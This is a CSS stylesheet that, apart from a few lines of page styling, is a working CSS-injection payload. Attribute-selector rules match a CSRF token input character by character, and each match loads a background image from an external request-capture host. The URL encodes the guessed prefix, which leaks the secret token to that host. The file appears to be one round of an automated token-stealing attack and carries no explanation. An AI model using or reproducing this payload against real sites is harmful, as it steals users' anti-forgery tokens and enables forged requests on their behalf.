html, body {
    width: 100%;
    margin: 0;
    padding: 0;
    color: #eeeeee;
    background: #232323;
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=0']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+48);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=1']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+49);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=2']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+50);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=3']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+51);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=4']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+52);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=5']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+53);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=6']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+54);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=7']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+55);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=8']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+56);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=9']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+57);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=a']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+97);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=b']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+98);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=c']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+99);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=d']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+100);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=e']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+101);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=f']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+102);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=g']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+103);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=h']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+104);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=i']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+105);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=j']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+106);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=k']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+107);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=l']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+108);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=m']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+109);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=n']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+110);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=o']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+111);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=p']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+112);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=q']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+113);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=r']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+114);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=s']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+115);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=t']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+116);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=u']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+117);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=v']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+118);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=w']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+119);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=x']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+120);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=y']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+121);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=z']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+122);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=A']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+65);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=B']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+66);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=C']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+67);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=D']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+68);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=E']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+69);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=F']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+70);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=G']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+71);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=H']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+72);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=I']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+73);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=J']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+74);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=K']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+75);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=L']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+76);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=M']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+77);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=N']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+78);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=O']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+79);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=P']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+80);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=Q']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+81);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=R']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+82);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=S']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+83);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=T']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+84);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=U']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+85);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=V']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+86);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=W']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+87);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=X']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+88);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=Y']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+89);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=Z']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+90);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=!']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+33);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=#']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+35);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=$']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+36);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=%']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+37);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=&']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+38);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7="']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+34);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=(']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+40);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=)']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+41);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=*']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+42);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=+']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+43);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=,']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+44);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=-']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+45);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=.']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+46);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=/']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+47);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=:']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+58);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=;']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+59);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=<']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+60);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7==']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+61);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=>']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+62);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=?']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+63);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=@']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+64);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=[']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+91);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=]']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+93);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=^']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+94);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=_']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+95);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=`']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+96);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7={']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+123);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=|']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+124);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=}']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+125);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7=~']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+126);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7= ']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55+61+32);
}

